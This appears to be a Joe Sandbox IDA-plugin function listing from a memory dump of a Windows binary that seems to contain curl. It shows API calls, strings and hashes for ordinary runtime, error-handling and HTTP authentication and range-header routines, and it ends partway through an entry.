Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _strrchr$free
String ID: %s%s$%s/%s$://
API String ID: 3904173637-3147304931
Opcode ID: cae19ccf340f537edef552abad25b3b590fc811c918f60f58e0f48bce26ffa86
Instruction ID: 671b11659e511ba677860474e294c8a767f8f76b27f58af5c2e45d99419fdc60
Opcode Fuzzy Hash: cae19ccf340f537edef552abad25b3b590fc811c918f60f58e0f48bce26ffa86
Instruction Fuzzy Hash: E121F532F04321BBDB2967A95851FAEA6E4DB54760F28007FFD05A7282EB71CD428294

Function 000C3B00 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85stringCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C3B75
fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 000C3B83
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C3B8C
ferror.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C3B96
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000C3BA6
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 000C3BAE

Strings

stdin: %s, xrefs: 000C3BB6

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_func$_errnoferrorfreadstrerror
String ID: stdin: %s
API String ID: 2463866935-3123201360
Opcode ID: f5835e8f10f88ae15169ffa3dc3515a936c5dcc96a9aedbf0e45331ac743c8a6
Instruction ID: be7f6d62940dc14db08de8f3cb0463d76cea45713066998dae19c97597c37691
Opcode Fuzzy Hash: f5835e8f10f88ae15169ffa3dc3515a936c5dcc96a9aedbf0e45331ac743c8a6
Instruction Fuzzy Hash: 8F21D032520B41DFCB648F29DD85EAFB3F9FB84761754842EFA0282912D771EE408A14

Function 000DA1A0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA1AB
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA1B3

Part of subcall function 000DA01F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 000DA058
Part of subcall function 000DA01F: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?), ref: 000DA06F
Part of subcall function 000DA01F: ___from_strstr_to_strchr.LIBCMT ref: 000DA087

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA1E9
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA1F6
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA1FE
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA209

Strings

Unknown error %u (0x%08X), xrefs: 000DA1D6

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLast_errno$FormatMessage___from_strstr_to_strchrwcstombs
String ID: Unknown error %u (0x%08X)
API String ID: 1622130791-1058733786
Opcode ID: d33ff7a2d276368eb84ad3d199c7401a3e740ad46d1ca9576478631c68b2e9c6
Instruction ID: d8f7643f0562187cbe82612b1af846c4e2702deb1adad75ec106acc3c9c829ef
Opcode Fuzzy Hash: d33ff7a2d276368eb84ad3d199c7401a3e740ad46d1ca9576478631c68b2e9c6
Instruction Fuzzy Hash: FAF08131700B00FFC3155BA99D49A9EBEEAAFDA791F504056F501D7361EBB08D80CA71

Function 000C2A46 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 38COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,000C2BF3), ref: 000C2A4D

Strings

No space left on the file system that will contain the directory %s., xrefs: 000C2A8D, 000C2A9A
You don't have permission to create %s., xrefs: 000C2A94
Cannot create directory %s because you exceeded your quota., xrefs: 000C2A78
The directory name %s is too long., xrefs: 000C2A7F
%s resides on a read-only file system., xrefs: 000C2A86
Error creating directory %s., xrefs: 000C2A71

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: _errno
String ID: %s resides on a read-only file system.$Cannot create directory %s because you exceeded your quota.$Error creating directory %s.$No space left on the file system that will contain the directory %s.$The directory name %s is too long.$You don't have permission to create %s.
API String ID: 2918714741-798752981
Opcode ID: 994581c3ebc359e7414035cc0d4b3182ceaac99b3ddf23f0741318cc60e318f2
Instruction ID: 188cd8f920086085e96996b0c5ef26b9c275803e41e8729b901e8c308e3784df
Opcode Fuzzy Hash: 994581c3ebc359e7414035cc0d4b3182ceaac99b3ddf23f0741318cc60e318f2
Instruction Fuzzy Hash: 37F0A062208103E7427DA7BF660CEBE4AA4D792392314073FF005E6FA4D664CCC6A21B

Function 00100D2B Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 222COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000F0B5D,?,?,00000001), ref: 00100E63
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,?,000F0B5D,?,?,00000001), ref: 00100ECE
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,?,?,?,000F0B5D,?,?,00000001), ref: 00100F09
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000000,?,?,?,000F0B5D,?,?,00000001), ref: 00100F86
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,000F0B5D,?,?,00000001), ref: 00100FC1

Strings

HTTP, xrefs: 00100D45
%sAuthorization: NTLM %s, xrefs: 00100EE5, 00100F9D
Proxy-, xrefs: 00100ED3, 00100EE4, 00100F8B, 00100F9C

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: %sAuthorization: NTLM %s$HTTP$Proxy-
API String ID: 1294909896-3667642693
Opcode ID: c3c9c73957632532312dc8aaeacea53c5328d0cc65898ccf638512c2c38c1d61
Instruction ID: 61bd0e4f4c2a466098a04649f7e589e540170aa6cc25850e0a9ac56c54d80f42
Opcode Fuzzy Hash: c3c9c73957632532312dc8aaeacea53c5328d0cc65898ccf638512c2c38c1d61
Instruction Fuzzy Hash: 0A914970A0420AEFDB15DFA8D880AADBBF5FF48314F10406AE855E7391DBB1AD51CB91

Function 00102CC6 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 201COMMON

Download Yara Rule

APIs

Part of subcall function 001067EE: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,000F0591,00000001,00000000,00000000,00000000,?,?,?), ref: 00106847

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,000F0D79,?), ref: 00102E88
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,000F0D79,?), ref: 00102EAD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,?,000F0D79,?), ref: 00102ECD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00102F34

Strings

Negotiate, xrefs: 00102DD7
Curl_output_negotiate, no persistent authentication: cleanup existing context, xrefs: 00102DB0
%sAuthorization: Negotiate %s, xrefs: 00102E60
Proxy-, xrefs: 00102E57, 00102E5F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$malloc
String ID: %sAuthorization: Negotiate %s$Curl_output_negotiate, no persistent authentication: cleanup existing context$Negotiate$Proxy-
API String ID: 2190258309-1255959952
Opcode ID: bd59f6ed4ac186be90d57b397c0f8a6e85c80d73a65cf3a11ec690d4e989e328
Instruction ID: 909544061d9fab418eb04a02fbdb43c81c1e2291c381fc67922a6de13352c416
Opcode Fuzzy Hash: bd59f6ed4ac186be90d57b397c0f8a6e85c80d73a65cf3a11ec690d4e989e328
Instruction Fuzzy Hash: 20710030B44206DFDB198B58C854BA97BF5EF45384F1980BEE8819B2D2EBB4DD80CB51

Function 000C18C8 Relevance: 12.1, APIs: 8, Instructions: 113COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,?,?,000C1773), ref: 000C18D7
___from_strstr_to_strchr.LIBCMT ref: 000C190C
_strrchr.LIBCMT ref: 000C191C
_strrchr.LIBCMT ref: 000C1931
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,000C1773), ref: 000C1944
___from_strstr_to_strchr.LIBCMT ref: 000C1955
___from_strstr_to_strchr.LIBCMT ref: 000C1965
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,000C1773), ref: 000C19A0

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchr$_strrchrfree$malloc
String ID:
API String ID: 3226260525-0
Opcode ID: bfc406c457bd7cf8f036da816a0f45e8f269149cacf61affe6f0e58ff873b120
Instruction ID: 220f225ac8996119771630e5d1a630aa7bca900965a9c2abd2fcc2de5d918efc
Opcode Fuzzy Hash: bfc406c457bd7cf8f036da816a0f45e8f269149cacf61affe6f0e58ff873b120
Instruction Fuzzy Hash: 79315B37109612AED7295728AC61EFE7BDDCF57360314406DF54197183EF319D4682B1

Function 000F2B7A Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 99COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F2BB8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000F2C0A

Strings

Range, xrefs: 000F2B95
Content-Range: bytes %s%I64d/%I64d, xrefs: 000F2C6B
Content-Range: bytes %s/%I64d, xrefs: 000F2C82
Content-Range, xrefs: 000F2BE5
Range: bytes=%s, xrefs: 000F2BC1
Content-Range: bytes 0-%I64d/%I64d, xrefs: 000F2C36

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: Content-Range$Content-Range: bytes %s%I64d/%I64d$Content-Range: bytes %s/%I64d$Content-Range: bytes 0-%I64d/%I64d$Range$Range: bytes=%s
API String ID: 1294909896-2902172602
Opcode ID: 10753c1d0dec6b2f69a211a379267a204e0192bf6e110c88dce4753f6d30abc6
Instruction ID: 1628c1749c712bc1ec664fc64b2c9fd717ea212ecf922a3afae399acdd9a3394
Opcode Fuzzy Hash: 10753c1d0dec6b2f69a211a379267a204e0192bf6e110c88dce4753f6d30abc6
Instruction Fuzzy Hash: AF315872B04616BFE32C1B74EC01FFBB391FB45310F11422AFA0893682DB212CA096E1

Function 000F50DE Relevance: 12.1, APIs: 8, Instructions: 97sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000F480B: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,000D24A8), ref: 000F4820
Part of subcall function 000F480B: __alldvrm.LIBCMT ref: 000F4839
Part of subcall function 000F480B: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000F4863

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,00000000), ref: 000F510A
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?,00000000), ref: 000F5118
Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(00000001), ref: 000F5159
MoveFileExA.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING),00000000,?,00000000), ref: 000F5166
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000F5175
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F5181
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000F51A1
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000F51AD

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$_strdup$CounterFileMovePerformanceQuerySleepUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
String ID:
API String ID: 1781201201-0
Opcode ID: 08c0ea96eaa877f66a221e465453fa4e58809444ad483fa951f180245a2f863e
Instruction ID: 9cddda3d5f152e7e251374e4b9787eb8a8f531645152ac601c5021f6ad9bf85d
Opcode Fuzzy Hash: 08c0ea96eaa877f66a221e465453fa4e58809444ad483fa951f180245a2f863e
Instruction Fuzzy Hash: CD21F472900A09EF9B15EFB4EC45AEF73EAFF49312B044025FE02EB541DBB0A9415A90

Function 00111110 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

_set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 00111113
_set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 0011111E
__p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 0011112A
__RTC_Initialize.LIBCMT ref: 00111142
_configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,001118B0), ref: 00111157

Part of subcall function 00111813: InitializeSListHead.KERNEL32(0012F430,00111167), ref: 00111818

__setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_00027BE0), ref: 00111175
_configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 00111190
_initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011119F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
String ID:
API String ID: 1933938900-0
Opcode ID: 86373801ee3943ec048a30c11da5a1e8cd4017b8989ee7f0437ab5bbf6aaa095
Instruction ID: e3002a9a6b52ca6607e9cafa3ab4c7a75c472ea55107a9195266f512f2d8091c
Opcode Fuzzy Hash: 86373801ee3943ec048a30c11da5a1e8cd4017b8989ee7f0437ab5bbf6aaa095
Instruction Fuzzy Hash: F301AF1194875638ED1C33F2B903BDEC1555F31394B208871FB04AA183EF6AC4E180BB

Function 0011224A Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00112241,001120AB,00111714), ref: 00112258
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00112266
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0011227F
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00112241,001120AB,00111714), ref: 001122D1

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2f52afcfc1797f1935d8cd8555125658deb5d43ddafef6fa3bffdfce9d591dc9
Instruction ID: 1fd8ae857682a201a626c080fed65bd75c7697075ce61b44709a206182a75897
Opcode Fuzzy Hash: 2f52afcfc1797f1935d8cd8555125658deb5d43ddafef6fa3bffdfce9d591dc9
Instruction Fuzzy Hash: 6001D8365087116D972D26B47C45AEF27A5EB15B70B20033DF410454F2EF714CF2A568

Function 00102110 Relevance: 11.4, APIs: 9, Instructions: 148COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00102223
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010223B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00102253
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010226B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00102283
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010229B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001022B3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001022CB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 001022E3

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: bf983a2945b9f0dd28b852c8bf8085e50de33e8259bd2cf4a69afb57afe20268
Instruction ID: 82bc88cc9f4d23413f6973bb4f9afb66af3af34271d5794dbc8afda243703d18
Opcode Fuzzy Hash: bf983a2945b9f0dd28b852c8bf8085e50de33e8259bd2cf4a69afb57afe20268
Instruction Fuzzy Hash: 8651A031504610DFDF298F10D84876937E2FF94325F24C0AAEC944B296DBB4AC92CF9A

Function 000DF65C Relevance: 11.3, APIs: 9, Instructions: 60COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,74F83C50,00000000,000E182F), ref: 000DF671
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF685
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF699
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6AD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6C1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6D5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6E9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF6FD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000DF70F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 7fb3a34d4dd920709dc7a7c6315bede887c20ebf44d6b65436b35df1e43f0989
Instruction ID: 96366f860648ddca05f45f35492224c45fcb9d771ca700c18cd839cb0eea3b20
Opcode Fuzzy Hash: 7fb3a34d4dd920709dc7a7c6315bede887c20ebf44d6b65436b35df1e43f0989
Instruction Fuzzy Hash: F0119732614825EB8B191F14FD0845CBBB6FF88661315C06BE45193A71DFA42CA28FE6

Function 000D0F87 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 460stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,I32,00000003,?,00000000,74F743D0,?,000D1589,?,?,?,?,00000000), ref: 000D1012

Strings

I32, xrefs: 000D100A
I64, xrefs: 000D1028

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: strncmp
String ID: I32$I64
API String ID: 1114863663-3980630743
Opcode ID: 2cd8194aab79bd05d83a8a4c77f050568bd2826e1dfb8a353458c4ac37a79dc7
Instruction ID: d29dd032b5e70850b9c08d806de7ce399a5314c1e19f08ee67efcd02cb6e9be9
Opcode Fuzzy Hash: 2cd8194aab79bd05d83a8a4c77f050568bd2826e1dfb8a353458c4ac37a79dc7
Instruction Fuzzy Hash: A4F1B4B1A04301BBDB6D8F6CD9A83FCBBE1EF45300F28416FD646D7795DA758A4086A0

Function 0010D2D8 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB20
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB42
realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010CB9C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010D01D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010D033

Strings

, xrefs: 0010D365

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free$callocmallocrealloc
String ID:
API String ID: 4199894680-3916222277
Opcode ID: 32e42d099d43d48d24c3ada8cabad13b0312c2aed8a064329002622296ebd6b8
Instruction ID: 2701f8ebcf09c63117f2bbcb0eed4b0bd9c07bde504803a32299f186b52c67c1
Opcode Fuzzy Hash: 32e42d099d43d48d24c3ada8cabad13b0312c2aed8a064329002622296ebd6b8
Instruction Fuzzy Hash: 58517A71604A129FC728CF69E644625BBF1FF84320F188629E485C7A90D7B2F891CFD2

Function 000C2BF8 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 166stringCOMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,00000000,00000001,00000000,?,?,000C199D,00000000,?,?,000C1773), ref: 000C2C7A
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000001,?,000C199D,00000000,?,?,000C1773), ref: 000C2C91
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\\?\,00000004), ref: 000C2CAE
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000004), ref: 000C2D52
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2D79

Strings

\\?\, xrefs: 000C2CA8
|<>"?*, xrefs: 000C2CF0

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
